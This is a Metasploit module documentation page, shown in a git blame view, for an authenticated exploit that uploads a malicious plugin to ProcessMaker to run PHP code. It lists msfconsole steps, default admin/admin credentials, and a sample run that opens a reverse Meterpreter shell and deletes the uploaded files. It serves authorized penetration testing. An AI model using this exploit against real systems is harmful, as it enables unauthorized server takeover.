adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
e2e8568860e381fc09e1ecedd5ddfc6fdfa3ce99
metasploit-gs/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

89 lines
3.3 KiB
Markdown
Raw Normal View History

Add documentation
2017-06-10 09:01:20 +00:00
## Description
This module will generate and upload a plugin to ProcessMaker resulting in execution of PHP code as the web server user.
Credentials for a valid user account with Administrator roles is required to run this module.
## Vulnerable Application
[ProcessMaker](https://www.processmaker.com/) workflow management software allows public and private organizations to automate document intensive, approval-based processes across departments and systems. Business users and process experts with no programming experience can design and run workflows.
This module has been tested successfully on ProcessMaker versions:
Update tested versions
2018-03-20 02:49:56 +00:00
* 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1
Add documentation
2017-06-10 09:01:20 +00:00
* 3.2.0 on Debian Linux 8
Source and Installers:
* [ProcessMaker](https://sourceforge.net/projects/processmaker/files/ProcessMaker/)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/multi/http/processmaker_plugin_upload`
3. Do: `set RHOST [IP]`
4. Do: `set USERNAME [USERNAME]` (default: `admin`)
5. Do: `set PASSWORD [PASSWORD]` (default: `admin`)
6. Do: `set WORKSPACE [WORKSPACE]` (default: `workflow`)
7. Do: `run`
8. You should get a session
## Options
**Username**
The username for a ProcessMaker user with Administrator roles (default: `admin`).
**Password**
The password for the ProcessMaker user (default: `admin`).
The default password for the `admin` user is `admin` on ProcessMaker versions 1.x and 2.x.
For ProcessMaker 3.x onwards, the default password is specified during installation and cannot be the same as the username.
However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively.
**Workspace**
The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`)
## Scenarios
```
msf > use exploit/multi/http/processmaker_plugin_upload
msf exploit(processmaker_plugin_upload) > set rhost 172.16.191.202
rhost => 172.16.191.202
msf exploit(processmaker_plugin_upload) > set username admin
username => admin
msf exploit(processmaker_plugin_upload) > set password admin
password => admin
msf exploit(processmaker_plugin_upload) > set workspace sample
workspace => sample
msf exploit(processmaker_plugin_upload) > set rport 8080
rport => 8080
msf exploit(processmaker_plugin_upload) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] Authenticating as user 'admin'
[+] 172.16.191.202:8080 Authenticated as user 'admin'
[*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes)
[*] Sending stage (33986 bytes) to 172.16.191.202
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php
meterpreter > getuid
Server username: user (1000)
meterpreter > sysinfo
Computer : debian
OS : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64
Meterpreter : php/linux
```
Reference in New Issue Copy Permalink